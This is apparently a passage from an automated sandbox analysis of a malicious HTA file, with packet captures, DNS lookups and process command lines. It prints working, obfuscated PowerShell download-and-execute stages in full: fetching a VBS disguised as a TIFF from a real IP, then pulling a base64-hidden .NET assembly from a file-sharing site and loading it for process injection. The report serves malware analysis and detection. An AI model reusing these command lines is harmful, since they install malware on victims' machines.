                                                                            Nov 28, 2024 07:18:12.531884909 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.540128946 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:14.165100098 CET4973080192.168.2.423.95.128.215

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 28, 2024 07:18:09.828231096 CET5710153192.168.2.41.1.1.1
                                                                            Nov 28, 2024 07:18:10.166172028 CET53571011.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 28, 2024 07:18:09.828231096 CET192.168.2.41.1.1.10xb7ceStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 28, 2024 07:18:10.166172028 CET1.1.1.1192.168.2.40xb7ceNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 28, 2024 07:18:10.166172028 CET1.1.1.1192.168.2.40xb7ceNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • 3105.filemail.com
                                                                            • 23.95.128.215

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973023.95.128.215806248C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 28, 2024 07:18:03.235958099 CET326OUTGET /226/seethepossiblethingsforentiretimetogivemebest.tIF HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: 23.95.128.215
                                                                            Connection: Keep-Alive
                                                                            Nov 28, 2024 07:18:04.397062063 CET1236INHTTP/1.1 200 OK
                                                                            Date: Thu, 28 Nov 2024 06:18:04 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                            Last-Modified: Tue, 26 Nov 2024 03:30:17 GMT
                                                                            ETag: "285c8-627c877d442cc"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 165320
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: image/tiff
                                                                            Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 55 00 49 00 4b 00 70 00 5a 00 50 00 52 00 76 00 6c 00 65 00 4c 00 69 00 6d 00 6e 00 7a 00 20 00 3d 00 20 00 22 00 71 00 55 00 69 00 6d 00 57 00 66 00 41 00 4c 00 61 00 63 00 49 00 43 00 48 00 6c 00 67 00 22 00 0d 00 0a 00 70 00 62 00 74 00 4c 00 57 00 55 00 68 00 4c 00 57 00 42 00 55 00 73 00 72 00 70 00 57 00 20 00 3d 00 20 00 22 00 6b 00 55 00 47 00 69 00 4b 00 70 00 78 00 4c 00 71 00 50 00 78 00 6a 00 43 00 70 00 62 00 22 00 0d 00 0a 00 57 00 6b 00 68 00 69 00 70 00 5a 00 6c 00 57 00 6e 00 68 00 7a 00 6e 00 70 00 57 00 71 00 20 00 3d 00 20 00 22 00 68 00 57 00 61 00 4c 00 41 00 63 00 76 00 6a 00 55 00 71 00 4e 00 6b 00 57 00 42 00 4a 00 22 00 0d 00 0a 00 47 00 47 00 68 00 5a 00 55 00 4b 00 7a 00 6e 00 41 00 7a 00 64 00 62 00 6d 00 68 00 6c 00 20 00 3d 00 20 00 22 00 71 00 6f 00 47 00 5a 00 55 00 57 00 55 00 42 00 69 00 54 00 71 00 4b 00 50 00 69 00 69 00 22 00 0d 00 0a 00 69 00 76 00 6d 00 6f 00 64 00 4b 00 4c 00 42 00 55 00 68 00 57 00 6b 00 4c 00 69 00 47 00 20 00 [TRUNCATED]
                                                                            Data Ascii: UIKpZPRvleLimnz = "qUimWfALacICHlg"pbtLWUhLWBUsrpW = "kUGiKpxLqPxjCpb"WkhipZlWnhznpWq = "hWaLAcvjUqNkWBJ"GGhZUKznAzdbmhl = "qoGZUWUBiTqKPii"ivmodKLBUhWkLiG = "kidpULuLPUkOWBN"eRBUfWUngcLiAZt = "biGJdQKOSJfdfbj"ZllBWAWWPRigcWW = "eWchzGKRpaHiUKL"kmOWjhWzlBLNbTC = "WCHSCiKWtUSLWBc"JNZleGAiHWGozmi = "dcOfOLtttlurKeL"cWdcPrQfInQzfrK = "BTGoUqfCozgtexk"kiumuobhhZicxGb = "UWIWpiJusOmfSca"bGgmeLkWlACLRUA = "aaZtcQNWiWbozmL"CnoWUWhi
                                                                            Nov 28, 2024 07:18:04.397172928 CET224INData Raw: 00 65 00 4c 00 69 00 50 00 75 00 54 00 74 00 20 00 3d 00 20 00 22 00 75 00 63 00 61 00 72 00 74 00 61 00 70 00 65 00 6c 00 65 00 55 00 41 00 70 00 66 00 57 00 69 00 41 00 43 00 57 00 4c 00 6b 00 47 00 22 00 0d 00 0a 00 73 00 55 00 6f 00 70 00 4b
                                                                            Data Ascii: eLiPuTt = "ucartapeleUApfWiACWLkG"sUopKLUiOiKZLLk = "drvbiiuexbxbSQi"UbxgauiWBcKWLRG = "lPiWKbKfLxqNClA"Lf
                                                                            Nov 28, 2024 07:18:04.397182941 CET1236INData Raw: 00 78 00 7a 00 4c 00 66 00 41 00 69 00 62 00 71 00 41 00 52 00 64 00 78 00 75 00 20 00 3d 00 20 00 22 00 66 00 4c 00 7a 00 66 00 69 00 57 00 57 00 68 00 75 00 6f 00 64 00 48 00 50 00 5a 00 4b 00 22 00 0d 00 0a 00 4c 00 47 00 6c 00 69 00 43 00 57
                                                                            Data Ascii: xzLfAibqARdxu = "fLzfiWWhuodHPZK"LGliCWcLzAliWaU = "mZlLOihKcKzdcLt"LLAIPuccGlNelOi = "UbUhpJRZktUqnrL"iasitAtvLWjq
                                                                            Nov 28, 2024 07:18:04.397247076 CET1236INData Raw: 00 5a 00 75 00 4c 00 4c 00 57 00 69 00 5a 00 4c 00 6b 00 7a 00 22 00 0d 00 0a 00 61 00 65 00 57 00 4b 00 72 00 47 00 43 00 41 00 4e 00 68 00 4c 00 5a 00 6b 00 4b 00 70 00 20 00 3d 00 20 00 22 00 64 00 68 00 54 00 4f 00 55 00 70 00 52 00 63 00 4b
                                                                            Data Ascii: ZuLLWiZLkz"aeWKrGCANhLZkKp = "dhTOUpRcKLKHLLL"LiAQhcbaoLRhLpS = "WKNcOqLPWWnPIuZ"cLUKmlkWAGLbAzR = "PczBheofWKzNikL
                                                                            Nov 28, 2024 07:18:04.397258997 CET1236INData Raw: 00 42 00 66 00 62 00 47 00 20 00 3d 00 20 00 22 00 6a 00 4c 00 6c 00 4b 00 70 00 74 00 66 00 5a 00 6d 00 51 00 68 00 69 00 6c 00 66 00 70 00 22 00 0d 00 0a 00 70 00 69 00 74 00 65 00 63 00 54 00 4c 00 57 00 6c 00 69 00 74 00 69 00 47 00 48 00 6a
                                                                            Data Ascii: BfbG = "jLlKptfZmQhilfp"pitecTLWlitiGHj = "NKniQIcUBBncCCA"GGzpveOnofmLoLQ = "GvioLGnWRqoZWos"iomWhBaLNNzWWjk = "
                                                                            Nov 28, 2024 07:18:04.397506952 CET1236INData Raw: 00 55 00 74 00 4c 00 66 00 6f 00 55 00 69 00 75 00 22 00 0d 00 0a 00 61 00 49 00 55 00 73 00 57 00 62 00 69 00 69 00 78 00 62 00 64 00 41 00 41 00 4b 00 4c 00 20 00 3d 00 20 00 22 00 72 00 71 00 52 00 67 00 66 00 4f 00 70 00 4c 00 4c 00 65 00 50
                                                                            Data Ascii: UtLfoUiu"aIUsWbiixbdAAKL = "rqRgfOpLLePmAbe"SOqqcSzKtoiUKcq = "bBHpckLzLfAziZK"tkcBzLLGkzdLWgL = "dPWTNlUfCZSKaLZ"
                                                                            Nov 28, 2024 07:18:04.397517920 CET1236INData Raw: 00 65 00 4e 00 6d 00 65 00 20 00 3d 00 20 00 22 00 42 00 54 00 4c 00 74 00 41 00 63 00 73 00 41 00 66 00 65 00 65 00 4c 00 41 00 61 00 43 00 22 00 0d 00 0a 00 4c 00 63 00 63 00 4c 00 4e 00 6f 00 5a 00 57 00 57 00 41 00 6d 00 4e 00 75 00 57 00 69
                                                                            Data Ascii: eNme = "BTLtAcsAfeeLAaC"LccLNoZWWAmNuWi = "BNILAzmGnLqxpko"uLTbicNUWriGSOJ = "KNOihkxWcWfPkKc"WAehWPfUcLILKhm = "Lf
                                                                            Nov 28, 2024 07:18:04.397528887 CET1236INData Raw: 00 4b 00 5a 00 4c 00 53 00 43 00 4e 00 22 00 0d 00 0a 00 6b 00 6f 00 4b 00 74 00 4b 00 73 00 41 00 55 00 66 00 4e 00 55 00 57 00 64 00 55 00 6c 00 20 00 3d 00 20 00 22 00 78 00 65 00 41 00 4c 00 57 00 75 00 63 00 53 00 64 00 70 00 47 00 68 00 69
                                                                            Data Ascii: KZLSCN"koKtKsAUfNUWdUl = "xeALWucSdpGhioG"fILazqOxKOLcZmj = "OkZWkqOPeGKWPcP"LxLfWGesedOKcKk = "WWANPBWLULezGGH"
                                                                            Nov 28, 2024 07:18:04.397540092 CET1236INData Raw: 00 69 00 6f 00 64 00 6b 00 6d 00 4b 00 4e 00 75 00 6d 00 20 00 3d 00 20 00 22 00 62 00 55 00 4b 00 47 00 54 00 57 00 69 00 57 00 71 00 78 00 48 00 50 00 47 00 57 00 52 00 22 00 0d 00 0a 00 43 00 67 00 50 00 4b 00 6e 00 6c 00 67 00 74 00 57 00 52
                                                                            Data Ascii: iodkmKNum = "bUKGTWiWqxHPGWR"CgPKnlgtWRWAUbz = "ZKLILRnheJcCnWG"WUmdLcAtikqmGZC = "AozdAvmLoOmdPWK"iUzKULToKOmqGLf
                                                                            Nov 28, 2024 07:18:04.397550106 CET1236INData Raw: 00 6a 00 4c 00 7a 00 68 00 62 00 68 00 22 00 0d 00 0a 00 4b 00 4b 00 4e 00 42 00 4c 00 4e 00 42 00 57 00 6a 00 71 00 7a 00 57 00 6d 00 67 00 63 00 20 00 3d 00 20 00 22 00 4e 00 51 00 7a 00 4b 00 6a 00 5a 00 42 00 6d 00 6e 00 78 00 68 00 6d 00 57
                                                                            Data Ascii: jLzhbh"KKNBLNBWjqzWmgc = "NQzKjZBmnxhmWpk"BkLnLqxGdiKAfhz = "ihUNiOzSnLmUPcj"WcfiiiTcdnBcbdi = "OWbCCWkUPPlJNKL"k
                                                                            Nov 28, 2024 07:18:04.517149925 CET1236INData Raw: 00 20 00 3d 00 20 00 22 00 7a 00 57 00 6e 00 65 00 69 00 69 00 6f 00 4c 00 70 00 63 00 57 00 41 00 69 00 63 00 63 00 22 00 0d 00 0a 00 4c 00 6e 00 68 00 57 00 62 00 4c 00 7a 00 4c 00 4c 00 66 00 4b 00 43 00 47 00 4e 00 42 00 20 00 3d 00 20 00 22
                                                                            Data Ascii: = "zWneiioLpcWAicc"LnhWbLzLLfKCGNB = "HUfcdeSlLBiLPKf"AzLWknOalkbkKkr = "fbiWmGiaaWWaGxL"hmcNxmLZinRlcUk = "WlkL


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449731193.30.119.2054432492C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-28 06:18:12 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                            Host: 3105.filemail.com
                                                                            Connection: Keep-Alive
                                                                            2024-11-28 06:18:12 UTC234INHTTP/1.1 500 Internal Server Error
                                                                            Cache-Control: no-cache,no-store
                                                                            Pragma: no-cache
                                                                            Transfer-Encoding: chunked
                                                                            Content-Type: application/json; charset=utf-8
                                                                            Expires: -1
                                                                            Date: Thu, 28 Nov 2024 06:18:12 GMT
                                                                            Connection: close
                                                                            2024-11-28 06:18:12 UTC307INData Raw: 31 32 63 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 65 78 70 69 72 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 34 35 32 30 61 66 34 37 2d 38 63 30 32 2d 34 30 32 34 2d 62 38 63 35 2d 63 32 31 34 30 34 65 34 62 39 65 30 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 54 72 61 6e 73 66 65 72 45 78
                                                                            Data Ascii: 12c{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"TransferExpired","ErrorMessage":"This transfer is expired"}],"responsestatus":"TransferExpired","errorid":"4520af47-8c02-4024-b8c5-c21404e4b9e0","errormessage":"transferid --> [TransferEx
                                                                            2024-11-28 06:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:01:17:56
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta"
                                                                            Imagebase:0xc90000
                                                                            File size:13'312 bytes
                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:01:17:57
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:01:17:57
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:01:17:58
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:01:18:02
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
                                                                            Imagebase:0x720000
                                                                            File size:2'141'552 bytes
                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:01:18:02
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"
                                                                            Imagebase:0xc60000
                                                                            File size:46'832 bytes
                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:01:18:07
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
                                                                            Imagebase:0xbe0000
                                                                            File size:147'456 bytes
                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:01:18:08
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:01:18:08
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:01:18:08
                                                                            Start date:28/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
                                                                            Imagebase:0xea0000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

